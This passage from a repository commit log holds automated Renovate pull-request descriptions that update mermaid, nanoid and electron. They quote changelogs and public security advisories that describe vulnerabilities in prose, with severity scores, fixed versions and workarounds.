(railroad-abnf-beta), and PEG (railroad-peg-beta). - [#​7774](https://redirect.github.com/mermaid-js/mermaid/pull/7774) [`e5c75e6`](https://redirect.github.com/mermaid-js/mermaid/commit/e5c75e6b797f84f8f652d8771eb1ce6161dd8f89) Thanks [@​ngdaniels](https://redirect.github.com/ngdaniels)! - feat(xychart): enable rotate label on X-axis - [#​7791](https://redirect.github.com/mermaid-js/mermaid/pull/7791) [`974fa7b`](https://redirect.github.com/mermaid-js/mermaid/commit/974fa7b7e791b442ad5f7862f1cbecd53d982485) Thanks [@​knsv-bot](https://redirect.github.com/knsv-bot)! - feat(swimlane): add swimlane as a standalone diagram type with a dedicated layered orthogonal layout algorithm ##### Patch Changes - [#​7744](https://redirect.github.com/mermaid-js/mermaid/pull/7744) [`633c261`](https://redirect.github.com/mermaid-js/mermaid/commit/633c261dadbaa20ee0cf9a0299e2269abe4ca573) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix(architecture): add `architecture.seed` config option to make architecture diagrams render deterministically. Resolves [#​7729](https://redirect.github.com/mermaid-js/mermaid/issues/7729). - [#​7732](https://redirect.github.com/mermaid-js/mermaid/pull/7732) [`c8ba156`](https://redirect.github.com/mermaid-js/mermaid/commit/c8ba156f551e94dd9a5c30b4971fe83ef3538634) Thanks [@​rkdfx](https://redirect.github.com/rkdfx)! - fix: tolerate leading horizontal whitespace before YAML frontmatter delimiters. Closes [#​7613](https://redirect.github.com/mermaid-js/mermaid/issues/7613) - [#​7314](https://redirect.github.com/mermaid-js/mermaid/pull/7314) [`4e4e6c4`](https://redirect.github.com/mermaid-js/mermaid/commit/4e4e6c4a108d834dd0f643b08deb89159e0eca94) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix(flowchart): Prevent crash when flowchart node shape is undefined - [#​7762](https://redirect.github.com/mermaid-js/mermaid/pull/7762) [`cfd2391`](https://redirect.github.com/mermaid-js/mermaid/commit/cfd23916f3c6b3ceafc4c0cfaf4078f6442bbc4f) Thanks [@​Dharya-dev](https://redirect.github.com/Dharya-dev)! - fix(class): support styling and callbacks for generic classes - [#​7284](https://redirect.github.com/mermaid-js/mermaid/pull/7284) [`c1f116d`](https://redirect.github.com/mermaid-js/mermaid/commit/c1f116d36646786326c596a5f25e519bdaac7748) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix(gantt): Render gantt vertical markers without affecting row layout or chart height - [#​7786](https://redirect.github.com/mermaid-js/mermaid/pull/7786) [`72fbab1`](https://redirect.github.com/mermaid-js/mermaid/commit/72fbab1a4d6efbfa219b13c1639dabcadc754ad8) Thanks [@​knsv-bot](https://redirect.github.com/knsv-bot)! - fix(er): allow special characters (e.g. dots) in ER diagram attribute names and types by escaping them with backticks - [#​7672](https://redirect.github.com/mermaid-js/mermaid/pull/7672) [`4887e97`](https://redirect.github.com/mermaid-js/mermaid/commit/4887e9721c33b5d771306a4e7ab768d78908a157) Thanks [@​sjackson0109](https://redirect.github.com/sjackson0109)! - fix(flowchart): respect per-subgraph direction keyword in Dagre layout. Fixes [#​4648](https://redirect.github.com/mermaid-js/mermaid/issues/4648) - [#​7734](https://redirect.github.com/mermaid-js/mermaid/pull/7734) [`a4c1e50`](https://redirect.github.com/mermaid-js/mermaid/commit/a4c1e507a347256f1f3a42be3feb5b6ddc7257f2) Thanks [@​OfirHaf](https://redirect.github.com/OfirHaf)! - fix(block): read block padding and sanitize config dynamically instead of at module load time - [#​7674](https://redirect.github.com/mermaid-js/mermaid/pull/7674) [`cc75089`](https://redirect.github.com/mermaid-js/mermaid/commit/cc750896b21a2715256ac0de486bafe0351c40c4) Thanks [@​cyphercodes](https://redirect.github.com/cyphercodes)! - fix(block): respect current DOMPurify config when sanitizing labels - [#​7711](https://redirect.github.com/mermaid-js/mermaid/pull/7711) [`be2e282`](https://redirect.github.com/mermaid-js/mermaid/commit/be2e28201445505ec68b1ebf6e3e6813fb6a6898) Thanks [@​Jinacker](https://redirect.github.com/Jinacker)! - fix(flowchart): render flowchart and state self-loop edges as a single SVG path. - [#​7781](https://redirect.github.com/mermaid-js/mermaid/pull/7781) [`d945968`](https://redirect.github.com/mermaid-js/mermaid/commit/d945968c13b154dcf2c89ad1e6ed5104458d32fe) Thanks [@​Dharya-dev](https://redirect.github.com/Dharya-dev)! - fix(radar): align axis labels based on angular position to prevent clipping - [#​7661](https://redirect.github.com/mermaid-js/mermaid/pull/7661) [`2f5e9e8`](https://redirect.github.com/mermaid-js/mermaid/commit/2f5e9e8c9aabb74e61e43428e91217e9585c8d05) Thanks [@​nabila401](https://redirect.github.com/nabila401)! - fix(venn): fix 3-circle venn diagram union rendering - [#​7780](https://redirect.github.com/mermaid-js/mermaid/pull/7780) [`8dcdce4`](https://redirect.github.com/mermaid-js/mermaid/commit/8dcdce40ee091aafd546aa842aca8b4da1e49c1b) Thanks [@​Dharya-dev](https://redirect.github.com/Dharya-dev)! - fix(xychart): truncate plot data to match x-axis category count - [#​7235](https://redirect.github.com/mermaid-js/mermaid/pull/7235) [`1bbc189`](https://redirect.github.com/mermaid-js/mermaid/commit/1bbc189b69be4c50a08ba74501567123769f30bb) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix: Support consecutive LaTeX in node text - [#​7247](https://redirect.github.com/mermaid-js/mermaid/pull/7247) [`365c1b1`](https://redirect.github.com/mermaid-js/mermaid/commit/365c1b1062dd6b5b7c59682f7df6b5c9ed40cd16) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix(treeView): Ensure treemap labels render correctly in large nested diagrams - [#​7754](https://redirect.github.com/mermaid-js/mermaid/pull/7754) [`06a32b7`](https://redirect.github.com/mermaid-js/mermaid/commit/06a32b74fbe574ba36fb77ffd9743a8b884b2f55) Thanks [@​palgunatm66](https://redirect.github.com/palgunatm66)! - fix(sequence): sequenceDiagram rect backgrounds using theme-aware fallback colors - [#​7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693) [`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba) Thanks [@​dull-bird](https://redirect.github.com/dull-bird)! - fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and other non-ASCII text in unquoted axis/quadrant/point labels. Fixes [#​7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120). - [#​7751](https://redirect.github.com/mermaid-js/mermaid/pull/7751) [`79e97cd`](https://redirect.github.com/mermaid-js/mermaid/commit/79e97cd7b9cb8f2d9bf6ba6d04de5cdeb4223d1b) Thanks [@​puneetdixit200](https://redirect.github.com/puneetdixit200)! - fix(state): render state diagram click tooltips with mermaidTooltip - [#​7570](https://redirect.github.com/mermaid-js/mermaid/pull/7570) [`c2305df`](https://redirect.github.com/mermaid-js/mermaid/commit/c2305df424963c0263d1c75804248db2969ee17e) Thanks [@​PinguinsRule](https://redirect.github.com/PinguinsRule)! - fix(state): Fix invalid syntax between state and '{' - [#​7758](https://redirect.github.com/mermaid-js/mermaid/pull/7758) [`a4a250b`](https://redirect.github.com/mermaid-js/mermaid/commit/a4a250b96321e0648eecfbadbfb17b1537dff691) Thanks [@​mk24x7](https://redirect.github.com/mk24x7)! - fix(venn): render labeled higher-arity unions when the underlying pairwise unions are not declared. Resolves [#​7656](https://redirect.github.com/mermaid-js/mermaid/issues/7656). - Updated dependencies \[[`ea1c48f`](https://redirect.github.com/mermaid-js/mermaid/commit/ea1c48f53fce5d025388d386c90da8743ee25b13), [`b4d0442`](https://redirect.github.com/mermaid-js/mermaid/commit/b4d0442dd1628acb3f71681519e7f47fc8bacf55), [`4e63e9d`](https://redirect.github.com/mermaid-js/mermaid/commit/4e63e9d338b6476df283afd4a002072945bc4563), [`216e4e9`](https://redirect.github.com/mermaid-js/mermaid/commit/216e4e9a61afceae885b00854f79e17373ccad31)]: - [@​mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@​1.2.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMi4wIiwidXBkYXRlZEluVmVyIjoiNDQuMTIuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
46ea493ecb |
chore: bump up nanoid version to v5.1.16 [SECURITY] (#15454)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nanoid](https://redirect.github.com/ai/nanoid) | [`5.1.6` → `5.1.16`](https://renovatebot.com/diffs/npm/nanoid/5.1.6/5.1.16) |  |  | --- ### nanoid: non-secure generators can loop indefinitely with negative size [CVE-2026-67214](https://nvd.nist.gov/vuln/detail/CVE-2026-67214) / [GHSA-28wg-ghj8-5hjv](https://redirect.github.com/advisories/GHSA-28wg-ghj8-5hjv) <details> <summary>More information</summary> #### Details nanoid (Nano ID) before 5.1.16 contains an infinite loop in the customAlphabet and nanoid functions of its non-secure module (nanoid/non-secure). When these functions are given a negative size, the loop counter is decremented from a negative value and never reaches its termination condition, spinning indefinitely and hanging the calling thread. An application that passes an unvalidated, attacker-controlled negative size to these functions is exposed to a denial-of-service condition. #### Severity - CVSS Score: 8.2 / 10 (High) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N` #### References - [https://nvd.nist.gov/vuln/detail/CVE-2026-67214](https://nvd.nist.gov/vuln/detail/CVE-2026-67214) - [https://github.com/ai/nanoid/commit/6ccc67bbaba71d3d77a21d9b636f4171a268ce49](https://redirect.github.com/ai/nanoid/commit/6ccc67bbaba71d3d77a21d9b636f4171a268ce49) - [https://github.com/ai/nanoid/releases/tag/5.1.16](https://redirect.github.com/ai/nanoid/releases/tag/5.1.16) - [https://www.vulncheck.com/advisories/nanoid-before-infinite-loop-via-negative-size-in-non-secure-module](https://www.vulncheck.com/advisories/nanoid-before-infinite-loop-via-negative-size-in-non-secure-module) - [https://github.com/ai/nanoid/pull/600](https://redirect.github.com/ai/nanoid/pull/600) - [https://github.com/ai/nanoid/pull/601](https://redirect.github.com/ai/nanoid/pull/601) - [https://github.com/ai/nanoid/commit/e835c9b71eab832bc6106944bdd26ea96cf2c66d](https://redirect.github.com/ai/nanoid/commit/e835c9b71eab832bc6106944bdd26ea96cf2c66d) - [https://github.com/advisories/GHSA-28wg-ghj8-5hjv](https://redirect.github.com/advisories/GHSA-28wg-ghj8-5hjv) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-28wg-ghj8-5hjv) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>ai/nanoid (nanoid)</summary> ### [`v5.1.16`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5116) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.15...5.1.16) - Fixed forever loop on negative size (by [@​spokodev](https://redirect.github.com/spokodev)). ### [`v5.1.15`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5115) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.14...5.1.15) - Fixed random pool corruption on big ID sizes. ### [`v5.1.14`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5114) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.13...5.1.14) - Fixed npm package size regression. ### [`v5.1.13`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5113) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.12...5.1.13) - Fixed npm package size regression. ### [`v5.1.12`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5112) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.11...5.1.12) - Moved to npm Provenance and Staged Publishing. ### [`v5.1.11`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5111) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.10...5.1.11) - Fixed breaking Nano ID by requesting big ID. ### [`v5.1.10`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#5110) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.9...5.1.10) - Fixed breaking Nano ID by requesting big ID (by [@​alanzabihi](https://redirect.github.com/alanzabihi)). ### [`v5.1.9`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#519) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.8...5.1.9) - Fixed npm package size regression. ### [`v5.1.8`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#518) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.7...5.1.8) - Made `cusatomAlphabet` 75% faster (by [@​saripovdenis](https://redirect.github.com/saripovdenis)). ### [`v5.1.7`](https://redirect.github.com/ai/nanoid/blob/HEAD/CHANGELOG.md#517) [Compare Source](https://redirect.github.com/ai/nanoid/compare/5.1.6...5.1.7) - Added `--version` to CLI (by [@​mahmoodhamdi](https://redirect.github.com/mahmoodhamdi)). - Updated `nanoid.js` for CDN (by [@​mahmoodhamdi](https://redirect.github.com/mahmoodhamdi)). - Fixed docs (by [@​mahmoodhamdi](https://redirect.github.com/mahmoodhamdi)). - Fixed `customRandom` types (by [@​oguimbal](https://redirect.github.com/oguimbal)). </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMi4wIiwidXBkYXRlZEluVmVyIjoiNDQuMTIuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
42322d13fe |
chore: bump up electron version to v39.8.10 [SECURITY] (#15441)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [electron](https://redirect.github.com/electron/electron) | [`39.8.6` → `39.8.10`](https://renovatebot.com/diffs/npm/electron/39.8.6/39.8.10) |  |  | --- ### Electron: Parent process code-sign check is spoofable [CVE-2026-70597](https://nvd.nist.gov/vuln/detail/CVE-2026-70597) / [GHSA-jm7p-cc5g-qwxx](https://redirect.github.com/advisories/GHSA-jm7p-cc5g-qwxx) <details> <summary>More information</summary> #### Details ##### Impact On macOS, the check Electron uses to confirm it was launched by a same-signed parent process could be bypassed by a local process. Apps that enable the fuse-based hardening restricting `ELECTRON_RUN_AS_NODE` and `NODE_OPTIONS` to same-signed parents rely on this check; a local attacker could bypass it and run their own code inside the signed app, inheriting its TCC permissions and keychain access. Apps are only affected if they enable those macOS fuse-based restrictions. Apps that do not enable them are not affected. ##### Workarounds There are no app side workarounds, you must update to a patched version of Electron. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-jm7p-cc5g-qwxx](https://redirect.github.com/electron/electron/security/advisories/GHSA-jm7p-cc5g-qwxx) - [https://github.com/electron/electron/commit/0a6291a97d210db3733689e70a51f5711e38ed35](https://redirect.github.com/electron/electron/commit/0a6291a97d210db3733689e70a51f5711e38ed35) - [https://github.com/advisories/GHSA-jm7p-cc5g-qwxx](https://redirect.github.com/advisories/GHSA-jm7p-cc5g-qwxx) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-jm7p-cc5g-qwxx) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Off-screen rendering trusts GPU-supplied geometry over shared-memory size [CVE-2026-70598](https://nvd.nist.gov/vuln/detail/CVE-2026-70598) / [GHSA-pfmc-3mgc-p6fp](https://redirect.github.com/advisories/GHSA-pfmc-3mgc-p6fp) <details> <summary>More information</summary> #### Details ##### Impact In offscreen rendering mode, frame data received from the GPU process was not fully validated by the main process. A compromised GPU process could cause the main process to read out-of-bounds memory while producing `paint` event images, disclosing memory or crashing the app. Apps are only affected if they use offscreen rendering (`webPreferences.offscreen`) and an attacker has separately gained code execution in the GPU process. Apps that do not use offscreen rendering are not affected. ##### Workarounds There are no app side workarounds, you must update to a patched version of Electron. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.10` ##### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 3.9 / 10 (Low) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:L` #### References - [https://github.com/electron/electron/security/advisories/GHSA-pfmc-3mgc-p6fp](https://redirect.github.com/electron/electron/security/advisories/GHSA-pfmc-3mgc-p6fp) - [https://github.com/electron/electron/commit/2c24640e7b0b9c74fe9f44bce0fde138340ff4fb](https://redirect.github.com/electron/electron/commit/2c24640e7b0b9c74fe9f44bce0fde138340ff4fb) - [https://github.com/advisories/GHSA-pfmc-3mgc-p6fp](https://redirect.github.com/advisories/GHSA-pfmc-3mgc-p6fp) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-pfmc-3mgc-p6fp) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Permission Check Handler Receives Main Frame Origin Instead of Requesting Iframe Origin [CVE-2026-70599](https://nvd.nist.gov/vuln/detail/CVE-2026-70599) / [GHSA-9pf5-hg6p-4pwp](https://redirect.github.com/advisories/GHSA-9pf5-hg6p-4pwp) <details> <summary>More information</summary> #### Details ##### Impact For serial-port and media (camera / microphone) permission checks made from an iframe, the `requestingOrigin` passed to `session.setPermissionCheckHandler` was the top-level frame's origin rather than the requesting frame's. Origin-based handler logic could therefore grant a cross-origin iframe device access intended only for the top-level origin. Apps are only affected if they use `setPermissionCheckHandler` with origin-based logic and embed cross-origin iframes with delegated device permissions. Apps that base the decision on `details.securityOrigin`, or that do not embed such iframes, are not affected. ##### Workarounds Check `details.securityOrigin` instead of `requestingOrigin` for these permissions, or do not delegate device permissions to untrusted iframes. ##### Fixed Versions * `42.0.0-beta.1` * `41.2.0` * `40.9.0` * `39.8.7` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.9 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-9pf5-hg6p-4pwp](https://redirect.github.com/electron/electron/security/advisories/GHSA-9pf5-hg6p-4pwp) - [https://github.com/electron/electron/commit/0cbdf2f0375466d701aa393c92e0ec29eb89ea6c](https://redirect.github.com/electron/electron/commit/0cbdf2f0375466d701aa393c92e0ec29eb89ea6c) - [https://github.com/advisories/GHSA-9pf5-hg6p-4pwp](https://redirect.github.com/advisories/GHSA-9pf5-hg6p-4pwp) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-9pf5-hg6p-4pwp) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Cross-origin iframe can position native autofill popup [CVE-2026-70600](https://nvd.nist.gov/vuln/detail/CVE-2026-70600) / [GHSA-x8rc-wpg4-grpf](https://redirect.github.com/advisories/GHSA-x8rc-wpg4-grpf) <details> <summary>More information</summary> #### Details ##### Impact The native autofill popup could be positioned by a cross-origin iframe outside that iframe's bounds, over the embedding page's UI, enabling clickjacking or spoofing of trusted UI. Apps are only affected if they embed untrusted content in iframes within windows that also display trusted UI. Apps that do not embed untrusted third-party content are not affected. ##### Workarounds Do not embed untrusted content in iframes inside windows that display trusted UI. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 3.1 / 10 (Low) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-x8rc-wpg4-grpf](https://redirect.github.com/electron/electron/security/advisories/GHSA-x8rc-wpg4-grpf) - [https://github.com/advisories/GHSA-x8rc-wpg4-grpf](https://redirect.github.com/advisories/GHSA-x8rc-wpg4-grpf) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-x8rc-wpg4-grpf) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Context isolation bypass via Function.prototype.bind hijack [CVE-2026-70601](https://nvd.nist.gov/vuln/detail/CVE-2026-70601) / [GHSA-h7rp-cf8h-j98x](https://redirect.github.com/advisories/GHSA-h7rp-cf8h-j98x) <details> <summary>More information</summary> #### Details ##### Impact Apps that expose Promise-returning functions to web content via `contextBridge` may be vulnerable to a context isolation bypass. Untrusted web content could obtain access to the isolated preload world and, through it, every capability the preload script has. In renderers without a sandbox, or with `nodeIntegration` enabled, this may escalate to Node.js access. Apps are affected if they expose Promise-returning functions via `contextBridge` — the standard pattern for wrapping `ipcRenderer.invoke` — in windows that load untrusted content. Apps that never load untrusted content in those windows are not affected. ##### Workarounds There are no app side workarounds, you must update to a patched version of Electron. ##### Fixed Versions * `42.0.0-beta.5` * `41.2.2` * `40.9.2` * `39.8.9` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-h7rp-cf8h-j98x](https://redirect.github.com/electron/electron/security/advisories/GHSA-h7rp-cf8h-j98x) - [https://github.com/advisories/GHSA-h7rp-cf8h-j98x](https://redirect.github.com/advisories/GHSA-h7rp-cf8h-j98x) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-h7rp-cf8h-j98x) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Extension tab APIs operate across session boundaries [CVE-2026-70602](https://nvd.nist.gov/vuln/detail/CVE-2026-70602) / [GHSA-m55f-7gqj-fr98](https://redirect.github.com/advisories/GHSA-m55f-7gqj-fr98) <details> <summary>More information</summary> #### Details ##### Impact Extension tab and scripting APIs were not scoped to the extension's own `session`. A malicious or compromised extension loaded into one session could navigate, script, and read from windows belonging to a different session. Apps are only affected if they load Chrome extensions via `session.loadExtension` and rely on separate sessions to isolate that extension from other content. Apps that do not load extensions, or that use a single session, are not affected. ##### Workarounds Only load extensions from sources you trust; do not rely on session separation alone to contain an extension. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 6.6 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-m55f-7gqj-fr98](https://redirect.github.com/electron/electron/security/advisories/GHSA-m55f-7gqj-fr98) - [https://github.com/advisories/GHSA-m55f-7gqj-fr98](https://redirect.github.com/advisories/GHSA-m55f-7gqj-fr98) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-m55f-7gqj-fr98) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Custom protocol with supportFetchAPI but not corsEnabled allows cross-origin reads [CVE-2026-70604](https://nvd.nist.gov/vuln/detail/CVE-2026-70604) / [GHSA-v3j7-r9gq-3gjw](https://redirect.github.com/advisories/GHSA-v3j7-r9gq-3gjw) <details> <summary>More information</summary> #### Details ##### Impact A custom scheme registered with `supportFetchAPI: true` but without `corsEnabled: true` was not subject to CORS enforcement. A page loaded from a remote origin could therefore `fetch()` or `XMLHttpRequest` that scheme cross-origin and read the full response body, rather than the read being blocked. Apps that serve sensitive data from such a scheme and load remote or untrusted content in a renderer are affected. Apps that set `corsEnabled: true`, or that do not load untrusted content, are not affected. ##### Workarounds Set `corsEnabled: true` on schemes that must enforce CORS, and validate the request `Origin` in your protocol handler before returning sensitive data. ##### Fixed Versions * `42.0.0` * `41.4.0` * `40.9.3` * `39.8.10` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 7.4 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-v3j7-r9gq-3gjw](https://redirect.github.com/electron/electron/security/advisories/GHSA-v3j7-r9gq-3gjw) - [https://github.com/advisories/GHSA-v3j7-r9gq-3gjw](https://redirect.github.com/advisories/GHSA-v3j7-r9gq-3gjw) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-v3j7-r9gq-3gjw) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: HTTP redirect followed into local file loader [CVE-2026-70605](https://nvd.nist.gov/vuln/detail/CVE-2026-70605) / [GHSA-v64r-4m7r-3mvq](https://redirect.github.com/advisories/GHSA-v64r-4m7r-3mvq) <details> <summary>More information</summary> #### Details ##### Impact When following HTTP redirects, `net.fetch()` and `net.request()` did not restrict which schemes a redirect could target. A remote server could redirect a request to a local resource, and if the app returns or forwards the response body, local file contents could be disclosed. Apps are only affected if they make `net` requests to attacker-influenced URLs with redirects followed (the default) and expose the response body. Apps that only request fixed, trusted URLs are not affected. ##### Workarounds Set `redirect: 'error'` or `redirect: 'manual'` on requests to untrusted URLs and validate any redirect target before following it. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.9 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-v64r-4m7r-3mvq](https://redirect.github.com/electron/electron/security/advisories/GHSA-v64r-4m7r-3mvq) - [https://github.com/advisories/GHSA-v64r-4m7r-3mvq](https://redirect.github.com/advisories/GHSA-v64r-4m7r-3mvq) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-v64r-4m7r-3mvq) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: window.open features string controls some window options considered privileged [CVE-2026-70607](https://nvd.nist.gov/vuln/detail/CVE-2026-70607) / [GHSA-v93f-fgjr-hjrj](https://redirect.github.com/advisories/GHSA-v93f-fgjr-hjrj) <details> <summary>More information</summary> #### Details ##### Impact Some window options supplied by web content in the `window.open()` features string were applied to the new `BrowserWindow` without an allowlist. Untrusted content could set window options it should not control, including options that cause the main process to access attacker-chosen file or network paths. Apps are only affected if untrusted content can call `window.open()` and the app does not override child window options via `setWindowOpenHandler`. Apps that deny `window.open()` for untrusted content, or set `overrideBrowserWindowOptions` explicitly, are not affected. ##### Workarounds Return `{ action: 'deny' }` from `setWindowOpenHandler` for untrusted content, or supply `overrideBrowserWindowOptions` so every window option is set explicitly. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-v93f-fgjr-hjrj](https://redirect.github.com/electron/electron/security/advisories/GHSA-v93f-fgjr-hjrj) - [https://github.com/electron/electron/pull/50946](https://redirect.github.com/electron/electron/pull/50946) - [https://github.com/electron/electron/pull/50947](https://redirect.github.com/electron/electron/pull/50947) - [https://github.com/electron/electron/pull/50948](https://redirect.github.com/electron/electron/pull/50948) - [https://github.com/electron/electron/pull/50949](https://redirect.github.com/electron/electron/pull/50949) - 